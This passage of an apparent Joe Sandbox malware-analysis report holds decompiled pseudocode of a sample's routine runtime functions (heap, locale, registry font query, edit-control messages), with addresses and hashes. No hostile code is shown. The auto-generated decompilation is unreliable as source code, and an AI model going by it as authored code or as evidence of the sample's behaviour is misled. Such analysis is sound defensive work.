                                                                                    					if(_t17 == 0 && _v20 == 4 && _v8 != _t17) {
                                                                                    						_t19 = _v8;
                                                                                    					}
                                                                                    					RegCloseKey(_v12);
                                                                                    				}
                                                                                    				return _t19;
                                                                                    			}









                                                                                    0x0040105a
                                                                                    0x00401071
                                                                                    0x00401089
                                                                                    0x00401090
                                                                                    0x00401098
                                                                                    0x004010a5
                                                                                    0x004010a5
                                                                                    0x004010ab
                                                                                    0x004010ab
                                                                                    0x004010b5

                                                                                    APIs
                                                                                    • RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 00401069
                                                                                    • RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,?,?,?), ref: 00401090
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004010AB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: LogPixels$Software\Fonts
                                                                                    • API String ID: 3677997916-4238338266
                                                                                    • Opcode ID: 34b995cda39885bd0091ff1aef1a18e8392eafd054f4e5ed3edcd8db48220016
                                                                                    • Instruction ID: a9dc7ae54450fe8809de1ee31deae739da478254df8c1b302dfb453a41a3a578
                                                                                    • Opcode Fuzzy Hash: 34b995cda39885bd0091ff1aef1a18e8392eafd054f4e5ed3edcd8db48220016
                                                                                    • Instruction Fuzzy Hash: 6CF03776A00209FADB209B94DC04FEFBBB8EB44705F104177EA41B2190E6B49A88CB19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 94%
                                                                                    			E0040C5DF(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                                                    				void* _t7;
                                                                                    				long _t8;
                                                                                    				intOrPtr* _t9;
                                                                                    				intOrPtr* _t12;
                                                                                    				long _t27;
                                                                                    				long _t30;
                                                                                    
                                                                                    				if(_a4 != 0) {
                                                                                    					_push(__esi);
                                                                                    					_t30 = _a8;
                                                                                    					__eflags = _t30;
                                                                                    					if(_t30 != 0) {
                                                                                    						_push(__edi);
                                                                                    						while(1) {
                                                                                    							__eflags = _t30 - 0xffffffe0;
                                                                                    							if(_t30 > 0xffffffe0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							__eflags = _t30;
                                                                                    							if(_t30 == 0) {
                                                                                    								_t30 = _t30 + 1;
                                                                                    								__eflags = _t30;
                                                                                    							}
                                                                                    							_t7 = HeapReAlloc( *0x415a64, 0, _a4, _t30);
                                                                                    							_t27 = _t7;
                                                                                    							__eflags = _t27;
                                                                                    							if(_t27 != 0) {
                                                                                    								L17:
                                                                                    								_t8 = _t27;
                                                                                    							} else {
                                                                                    								__eflags =  *0x415f58 - _t7;
                                                                                    								if(__eflags == 0) {
                                                                                    									_t9 = E0040370A(__eflags);
                                                                                    									 *_t9 = E004036C8(GetLastError());
                                                                                    									goto L17;
                                                                                    								} else {
                                                                                    									__eflags = E0040B343(_t7, _t30);
                                                                                    									if(__eflags == 0) {
                                                                                    										_t12 = E0040370A(__eflags);
                                                                                    										 *_t12 = E004036C8(GetLastError());
                                                                                    										L12:
                                                                                    										_t8 = 0;
                                                                                    										__eflags = 0;
                                                                                    									} else {
                                                                                    										continue;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							goto L14;
                                                                                    						}
                                                                                    						E0040B343(_t6, _t30);
                                                                                    						 *((intOrPtr*)(E0040370A(__eflags))) = 0xc;
                                                                                    						goto L12;
                                                                                    					} else {
                                                                                    						E00408BC0(_a4);
                                                                                    						_t8 = 0;
                                                                                    					}
                                                                                    					L14:
                                                                                    					return _t8;
                                                                                    				} else {
                                                                                    					return E0040C4C9(__edx, __edi, __esi, _a8);
                                                                                    				}
                                                                                    			}









                                                                                    0x0040c5e8
                                                                                    0x0040c5f5
                                                                                    0x0040c5f6
                                                                                    0x0040c5f9
                                                                                    0x0040c5fb
                                                                                    0x0040c60a
                                                                                    0x0040c63d
                                                                                    0x0040c63d
                                                                                    0x0040c640
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040c60d
                                                                                    0x0040c60f
                                                                                    0x0040c611
                                                                                    0x0040c611
                                                                                    0x0040c611
                                                                                    0x0040c61e
                                                                                    0x0040c624
                                                                                    0x0040c626
                                                                                    0x0040c628
                                                                                    0x0040c688
                                                                                    0x0040c688
                                                                                    0x0040c62a
                                                                                    0x0040c62a
                                                                                    0x0040c630
                                                                                    0x0040c672
                                                                                    0x0040c686
                                                                                    0x00000000
                                                                                    0x0040c632
                                                                                    0x0040c639
                                                                                    0x0040c63b
                                                                                    0x0040c65a
                                                                                    0x0040c66e
                                                                                    0x0040c654
                                                                                    0x0040c654
                                                                                    0x0040c654
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040c63b
                                                                                    0x0040c630
                                                                                    0x00000000
                                                                                    0x0040c656
                                                                                    0x0040c643
                                                                                    0x0040c64e
                                                                                    0x00000000
                                                                                    0x0040c5fd
                                                                                    0x0040c600
                                                                                    0x0040c606
                                                                                    0x0040c606
                                                                                    0x0040c657
                                                                                    0x0040c659
                                                                                    0x0040c5ea
                                                                                    0x0040c5f4
                                                                                    0x0040c5f4

                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 0040C5ED
                                                                                      • Part of subcall function 0040C4C9: __FF_MSGBANNER.LIBCMT ref: 0040C4E2
                                                                                      • Part of subcall function 0040C4C9: __NMSG_WRITE.LIBCMT ref: 0040C4E9
                                                                                      • Part of subcall function 0040C4C9: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00408C0B,00000000,00000001,00000000,?,0040A2E2,00000018,00412270,0000000C,0040A372), ref: 0040C50E
                                                                                    • _free.LIBCMT ref: 0040C600
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                    • String ID:
                                                                                    • API String ID: 1020059152-0
                                                                                    • Opcode ID: fefdf8a66b65aac27a5e3c921786e7e5e3cdc4d72facf406c1a772385b061672
                                                                                    • Instruction ID: 6a77f78aa43c2d9d91f7950ce4b899985eb708febcdd106683cded96f858de10
                                                                                    • Opcode Fuzzy Hash: fefdf8a66b65aac27a5e3c921786e7e5e3cdc4d72facf406c1a772385b061672
                                                                                    • Instruction Fuzzy Hash: F411C432410615EACB313FB1AC456AA3B589B543A1F308B3BF849B72D1DB3E8941969C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004010B6() {
                                                                                    				void* _v8;
                                                                                    				void* _v12;
                                                                                    				void* _v524;
                                                                                    				long _t13;
                                                                                    				long _t18;
                                                                                    				int _t19;
                                                                                    				int _t23;
                                                                                    
                                                                                    				SendMessageW( *0x415f6c, 0xb0,  &_v12,  &_v8);
                                                                                    				_t19 = _v12;
                                                                                    				if(_t19 == _v8) {
                                                                                    					 *0x4170f0 = _t19;
                                                                                    				}
                                                                                    				if(_t19 >=  *0x4170f0) {
                                                                                    					_t19 = _v8;
                                                                                    				}
                                                                                    				_t23 = SendMessageW( *0x415f6c, 0xc9, _t19, 0);
                                                                                    				_t13 = SendMessageW( *0x415f6c, 0xbb, _t23, 0);
                                                                                    				if( *0x4170f4 != _t23 ||  *0x4170f8 != _t19) {
                                                                                    					_t6 = _t23 + 1; // 0x1
                                                                                    					swprintf( &_v524, 0x231,  *0x415f7c, _t6, _t19 - _t13 + 1);
                                                                                    					_t18 = SendMessageW( *0x415f74, 0x29, 0,  &_v524);
                                                                                    					 *0x4170f4 = _t23;
                                                                                    					 *0x4170f8 = _t19;
                                                                                    					return _t18;
                                                                                    				}
                                                                                    				return _t13;
                                                                                    			}










                                                                                    0x004010db
                                                                                    0x004010dd
                                                                                    0x004010e3
                                                                                    0x004010e5
                                                                                    0x004010e5
                                                                                    0x004010f1
                                                                                    0x004010f3
                                                                                    0x004010f3
                                                                                    0x00401108
                                                                                    0x00401116
                                                                                    0x0040111e
                                                                                    0x0040112e
                                                                                    0x00401144
                                                                                    0x0040115d
                                                                                    0x0040115f
                                                                                    0x00401165
                                                                                    0x00000000
                                                                                    0x00401165
                                                                                    0x0040116f

                                                                                    APIs
                                                                                    • SendMessageW.USER32(000000B0,?,?), ref: 004010DB
                                                                                    • SendMessageW.USER32(000000C9,?,00000000), ref: 00401104
                                                                                    • SendMessageW.USER32(000000BB,00000000,00000000), ref: 00401116
                                                                                    • swprintf.LIBCMT ref: 00401144
                                                                                    • SendMessageW.USER32(00000029,00000000,?), ref: 0040115D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3793038206-0
                                                                                    • Opcode ID: 2fd1dc92b16ec5f4e4f75ff0f9bcaf04bd9515726b0b656210148fd59d724adf
                                                                                    • Instruction ID: 66af78921c5875677350cfaec2ba26a2b368e15f8c7f004a64a750f81ebf7e58
                                                                                    • Opcode Fuzzy Hash: 2fd1dc92b16ec5f4e4f75ff0f9bcaf04bd9515726b0b656210148fd59d724adf
                                                                                    • Instruction Fuzzy Hash: 1F119E76A40309FFDB11DB94EC85FEA7BBCE748700F108177E650A61A1E3B12E458B68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E004089C0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _t12;
                                                                                    				void* _t28;
                                                                                    				intOrPtr _t29;
                                                                                    				void* _t30;
                                                                                    				void* _t31;
                                                                                    
                                                                                    				_t31 = __eflags;
                                                                                    				_t26 = __edi;
                                                                                    				_t25 = __edx;
                                                                                    				_t20 = __ebx;
                                                                                    				_push(0xc);
                                                                                    				_push(0x4121e8);
                                                                                    				E00405990(__ebx, __edi, __esi);
                                                                                    				_t28 = E004072A9(__ebx, __edx, _t31);
                                                                                    				_t12 =  *0x414aa8; // 0xfffffffe
                                                                                    				if(( *(_t28 + 0x70) & _t12) == 0) {
                                                                                    					L6:
                                                                                    					E0040A357(_t20, _t26, 0xc);
                                                                                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                                    					_t29 = _t28 + 0x6c;
                                                                                    					 *((intOrPtr*)(_t30 - 0x1c)) = E00408973(_t29,  *0x414cf0);
                                                                                    					 *(_t30 - 4) = 0xfffffffe;
                                                                                    					E00408A2D();
                                                                                    				} else {
                                                                                    					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                    						goto L6;
                                                                                    					} else {
                                                                                    						_t29 =  *((intOrPtr*)(E004072A9(_t20, __edx, _t33) + 0x6c));
                                                                                    					}
                                                                                    				}
                                                                                    				_t34 = _t29;
                                                                                    				if(_t29 == 0) {
                                                                                    					_push(0x20);
                                                                                    					E004069B9(_t25, _t34);
                                                                                    				}
                                                                                    				return E004059D5(_t29);
                                                                                    			}








                                                                                    0x004089c0
                                                                                    0x004089c0
                                                                                    0x004089c0
                                                                                    0x004089c0
                                                                                    0x004089c0
                                                                                    0x004089c2
                                                                                    0x004089c7
                                                                                    0x004089d1
                                                                                    0x004089d3
                                                                                    0x004089db
                                                                                    0x004089ff
                                                                                    0x00408a01
                                                                                    0x00408a07
                                                                                    0x00408a11
                                                                                    0x00408a1c
                                                                                    0x00408a1f
                                                                                    0x00408a26
                                                                                    0x004089dd
                                                                                    0x004089dd
                                                                                    0x004089e1
                                                                                    0x00000000
                                                                                    0x004089e3
                                                                                    0x004089e8
                                                                                    0x004089e8
                                                                                    0x004089e1
                                                                                    0x004089eb
                                                                                    0x004089ed
                                                                                    0x004089ef
                                                                                    0x004089f1
                                                                                    0x004089f6
                                                                                    0x004089fe

                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 004089CC
                                                                                      • Part of subcall function 004072A9: __getptd_noexit.LIBCMT ref: 004072AC
                                                                                      • Part of subcall function 004072A9: __amsg_exit.LIBCMT ref: 004072B9
                                                                                    • __getptd.LIBCMT ref: 004089E3
                                                                                    • __amsg_exit.LIBCMT ref: 004089F1
                                                                                    • __lock.LIBCMT ref: 00408A01
                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00408A15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                    • String ID:
                                                                                    • API String ID: 938513278-0
                                                                                    • Opcode ID: 0048ee2e9d654e88571322e1a7f2b20f4c6b62c7380a38d321b6e8247d482b4b
                                                                                    • Instruction ID: 976e5cdb44841edbfc45673e9f197270e52d64d1e78c74b2d10079b09f234e8e
                                                                                    • Opcode Fuzzy Hash: 0048ee2e9d654e88571322e1a7f2b20f4c6b62c7380a38d321b6e8247d482b4b
                                                                                    • Instruction Fuzzy Hash: C3F062B2904601ABD625BBAA5906B6E32909F00724F15416FF494B62D3CF7C59409A5F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004057DE() {
                                                                                    				intOrPtr _t5;
                                                                                    				intOrPtr _t6;
                                                                                    				intOrPtr _t10;
                                                                                    				void* _t12;
                                                                                    				intOrPtr _t15;
                                                                                    				intOrPtr* _t16;
                                                                                    				signed int _t19;
                                                                                    				signed int _t20;
                                                                                    				intOrPtr _t26;
                                                                                    				intOrPtr _t27;
                                                                                    
                                                                                    				_t5 =  *0x4182a0;
                                                                                    				_t26 = 0x14;
                                                                                    				if(_t5 != 0) {
                                                                                    					if(_t5 < _t26) {
                                                                                    						_t5 = _t26;
                                                                                    						goto L4;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t5 = 0x200;
                                                                                    					L4:
                                                                                    					 *0x4182a0 = _t5;
                                                                                    				}
                                                                                    				_t6 = E00408C3F(_t5, 4);
                                                                                    				 *0x417284 = _t6;
                                                                                    				if(_t6 != 0) {
                                                                                    					L8:
                                                                                    					_t19 = 0;
                                                                                    					_t15 = 0x4142b0;
                                                                                    					while(1) {
                                                                                    						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                                                    						_t15 = _t15 + 0x20;
                                                                                    						_t19 = _t19 + 4;
                                                                                    						if(_t15 >= 0x414530) {
                                                                                    							break;
                                                                                    						}
                                                                                    						_t6 =  *0x417284;
                                                                                    					}
                                                                                    					_t27 = 0xfffffffe;
                                                                                    					_t20 = 0;
                                                                                    					_t16 = 0x4142c0;
                                                                                    					do {
                                                                                    						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x417180 + (_t20 >> 5) * 4))));
                                                                                    						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                                                    							 *_t16 = _t27;
                                                                                    						}
                                                                                    						_t16 = _t16 + 0x20;
                                                                                    						_t20 = _t20 + 1;
                                                                                    					} while (_t16 < 0x414320);
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					 *0x4182a0 = _t26;
                                                                                    					_t6 = E00408C3F(_t26, 4);
                                                                                    					 *0x417284 = _t6;
                                                                                    					if(_t6 != 0) {
                                                                                    						goto L8;
                                                                                    					} else {
                                                                                    						_t12 = 0x1a;
                                                                                    						return _t12;
                                                                                    					}
                                                                                    				}
                                                                                    			}













                                                                                    0x004057de
                                                                                    0x004057e6
                                                                                    0x004057e9
                                                                                    0x004057f4
                                                                                    0x004057f6
                                                                                    0x00000000
                                                                                    0x004057f6
                                                                                    0x004057eb
                                                                                    0x004057eb
                                                                                    0x004057f8
                                                                                    0x004057f8
                                                                                    0x004057f8
                                                                                    0x00405800
                                                                                    0x00405807
                                                                                    0x0040580e
                                                                                    0x0040582e
                                                                                    0x0040582e
                                                                                    0x00405830
                                                                                    0x0040583c
                                                                                    0x0040583c
                                                                                    0x0040583f
                                                                                    0x00405842
                                                                                    0x0040584b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405837
                                                                                    0x00405837
                                                                                    0x0040584f
                                                                                    0x00405850
                                                                                    0x00405852
                                                                                    0x00405858
                                                                                    0x0040586c
                                                                                    0x00405872
                                                                                    0x0040587c
                                                                                    0x0040587c
                                                                                    0x0040587e
                                                                                    0x00405881
                                                                                    0x00405882
                                                                                    0x0040588e
                                                                                    0x00405810
                                                                                    0x00405813
                                                                                    0x00405819
                                                                                    0x00405820
                                                                                    0x00405827
                                                                                    0x00000000
                                                                                    0x00405829
                                                                                    0x0040582b
                                                                                    0x0040582d
                                                                                    0x0040582d
                                                                                    0x00405827

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: __calloc_crt
                                                                                    • String ID: CA$0EA
                                                                                    • API String ID: 3494438863-962656358
                                                                                    • Opcode ID: e9080e8dac64272fba36a94873b48f66def676edf17581a6cb3ff4e48fb4461a
                                                                                    • Instruction ID: 86693eefe5dd9b7c921068e51d74e635daad96af07061ee7db7e118806e0be7c
                                                                                    • Opcode Fuzzy Hash: e9080e8dac64272fba36a94873b48f66def676edf17581a6cb3ff4e48fb4461a
                                                                                    • Instruction Fuzzy Hash: 7111E772704A155BE7249F1EBD406A73395EB84364B24817FF914E73D0EB3CC8825A4C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00408D7B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                    				char _v8;
                                                                                    				signed int _v12;
                                                                                    				char _v20;
                                                                                    				char _t43;
                                                                                    				char _t46;
                                                                                    				signed int _t53;
                                                                                    				signed int _t54;
                                                                                    				intOrPtr _t56;
                                                                                    				int _t57;
                                                                                    				int _t58;
                                                                                    				char _t59;
                                                                                    				short* _t60;
                                                                                    				int _t65;
                                                                                    				char* _t73;
                                                                                    
                                                                                    				_t73 = _a8;
                                                                                    				if(_t73 == 0 || _a12 == 0) {
                                                                                    					L5:
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					if( *_t73 != 0) {
                                                                                    						E00403753( &_v20, __edi, _a16);
                                                                                    						_t43 = _v20;
                                                                                    						__eflags =  *(_t43 + 0x14);
                                                                                    						if( *(_t43 + 0x14) != 0) {
                                                                                    							_t46 = E00408EAB( *_t73 & 0x000000ff,  &_v20);
                                                                                    							__eflags = _t46;
                                                                                    							if(_t46 == 0) {
                                                                                    								__eflags = _a4;
                                                                                    								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                    								if(__eflags != 0) {
                                                                                    									L10:
                                                                                    									__eflags = _v8;
                                                                                    									if(_v8 != 0) {
                                                                                    										_t53 = _v12;
                                                                                    										_t11 = _t53 + 0x70;
                                                                                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                    										__eflags =  *_t11;
                                                                                    									}
                                                                                    									return 1;
                                                                                    								}
                                                                                    								L21:
                                                                                    								_t54 = E0040370A(__eflags);
                                                                                    								 *_t54 = 0x2a;
                                                                                    								__eflags = _v8;
                                                                                    								if(_v8 != 0) {
                                                                                    									_t54 = _v12;
                                                                                    									_t33 = _t54 + 0x70;
                                                                                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                    									__eflags =  *_t33;
                                                                                    								}
                                                                                    								return _t54 | 0xffffffff;
                                                                                    							}
                                                                                    							_t56 = _v20;
                                                                                    							_t65 =  *(_t56 + 0xac);
                                                                                    							__eflags = _t65 - 1;
                                                                                    							if(_t65 <= 1) {
                                                                                    								L17:
                                                                                    								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                    								if(__eflags < 0) {
                                                                                    									goto L21;
                                                                                    								}
                                                                                    								__eflags = _t73[1];
                                                                                    								if(__eflags == 0) {
                                                                                    									goto L21;
                                                                                    								}
                                                                                    								L19:
                                                                                    								_t57 =  *(_t56 + 0xac);
                                                                                    								__eflags = _v8;
                                                                                    								if(_v8 == 0) {
                                                                                    									return _t57;
                                                                                    								}
                                                                                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                    								return _t57;
                                                                                    							}
                                                                                    							__eflags = _a12 - _t65;
                                                                                    							if(_a12 < _t65) {
                                                                                    								goto L17;
                                                                                    							}
                                                                                    							__eflags = _a4;
                                                                                    							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                    							__eflags = _t58;
                                                                                    							_t56 = _v20;
                                                                                    							if(_t58 != 0) {
                                                                                    								goto L19;
                                                                                    							}
                                                                                    							goto L17;
                                                                                    						}
                                                                                    						_t59 = _a4;
                                                                                    						__eflags = _t59;
                                                                                    						if(_t59 != 0) {
                                                                                    							 *_t59 =  *_t73 & 0x000000ff;
                                                                                    						}
                                                                                    						goto L10;
                                                                                    					} else {
                                                                                    						_t60 = _a4;
                                                                                    						if(_t60 != 0) {
                                                                                    							 *_t60 = 0;
                                                                                    						}
                                                                                    						goto L5;
                                                                                    					}
                                                                                    				}
                                                                                    			}

















                                                                                    0x00408d85
                                                                                    0x00408d8c
                                                                                    0x00408da3
                                                                                    0x00000000
                                                                                    0x00408d93
                                                                                    0x00408d95
                                                                                    0x00408daf
                                                                                    0x00408db4
                                                                                    0x00408db7
                                                                                    0x00408dba
                                                                                    0x00408de2
                                                                                    0x00408de9
                                                                                    0x00408deb
                                                                                    0x00408e6c
                                                                                    0x00408e87
                                                                                    0x00408e89
                                                                                    0x00408dc9
                                                                                    0x00408dc9
                                                                                    0x00408dcc
                                                                                    0x00408dce
                                                                                    0x00408dd1
                                                                                    0x00408dd1
                                                                                    0x00408dd1
                                                                                    0x00408dd1
                                                                                    0x00000000
                                                                                    0x00408dd7
                                                                                    0x00408e4b
                                                                                    0x00408e4b
                                                                                    0x00408e50
                                                                                    0x00408e56
                                                                                    0x00408e59
                                                                                    0x00408e5b
                                                                                    0x00408e5e
                                                                                    0x00408e5e
                                                                                    0x00408e5e
                                                                                    0x00408e5e
                                                                                    0x00000000
                                                                                    0x00408e62
                                                                                    0x00408ded
                                                                                    0x00408df0
                                                                                    0x00408df6
                                                                                    0x00408df9
                                                                                    0x00408e20
                                                                                    0x00408e23
                                                                                    0x00408e29
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00408e2b
                                                                                    0x00408e2e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00408e30
                                                                                    0x00408e30
                                                                                    0x00408e36
                                                                                    0x00408e39
                                                                                    0x00408da8
                                                                                    0x00408da8
                                                                                    0x00408e42
                                                                                    0x00000000
                                                                                    0x00408e42
                                                                                    0x00408dfb
                                                                                    0x00408dfe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00408e02
                                                                                    0x00408e13
                                                                                    0x00408e19
                                                                                    0x00408e1b
                                                                                    0x00408e1e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00408e1e
                                                                                    0x00408dbc
                                                                                    0x00408dbf
                                                                                    0x00408dc1
                                                                                    0x00408dc6
                                                                                    0x00408dc6
                                                                                    0x00000000
                                                                                    0x00408d97
                                                                                    0x00408d97
                                                                                    0x00408d9c
                                                                                    0x00408da0
                                                                                    0x00408da0
                                                                                    0x00000000
                                                                                    0x00408d9c
                                                                                    0x00408d95

                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00408DAF
                                                                                    • __isleadbyte_l.LIBCMT ref: 00408DE2
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,004029D6,?,00000000,00000000,?,?,?,?,004029D6), ref: 00408E13
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,004029D6,00000001,00000000,00000000,?,?,?,?,004029D6), ref: 00408E81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: 146e9b4077365b13abf7a7884f3efbec45004c9151c7c70d510fedc203469ba8
                                                                                    • Instruction ID: 0c9ba43707c01210f15d82bc915928d229edbab3a984a60048fa1d6b0ab5e1b1
                                                                                    • Opcode Fuzzy Hash: 146e9b4077365b13abf7a7884f3efbec45004c9151c7c70d510fedc203469ba8
                                                                                    • Instruction Fuzzy Hash: BF31B131A00245EFDB20DFA4CD849AA3BB5EF41310F24867EE4A5AB2D1DB38DD41DB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00404E68(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                    				intOrPtr _t25;
                                                                                    				void* _t26;
                                                                                    
                                                                                    				_t25 = _a16;
                                                                                    				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                    					_t26 = E0040475A(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                    					goto L9;
                                                                                    				} else {
                                                                                    					_t35 = _t25 - 0x66;
                                                                                    					if(_t25 != 0x66) {
                                                                                    						__eflags = _t25 - 0x61;
                                                                                    						if(_t25 == 0x61) {
                                                                                    							L7:
                                                                                    							_t26 = E00404841(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                                    						} else {
                                                                                    							__eflags = _t25 - 0x41;
                                                                                    							if(__eflags == 0) {
                                                                                    								goto L7;
                                                                                    							} else {
                                                                                    								_t26 = E00404D7B(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                    							}
                                                                                    						}
                                                                                    						L9:
                                                                                    						return _t26;
                                                                                    					} else {
                                                                                    						return E00404CBA(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                    					}
                                                                                    				}
                                                                                    			}





                                                                                    0x00404e6d
                                                                                    0x00404e73
                                                                                    0x00404ee6
                                                                                    0x00000000
                                                                                    0x00404e7a
                                                                                    0x00404e7a
                                                                                    0x00404e7d
                                                                                    0x00404e98
                                                                                    0x00404e9b
                                                                                    0x00404ebb
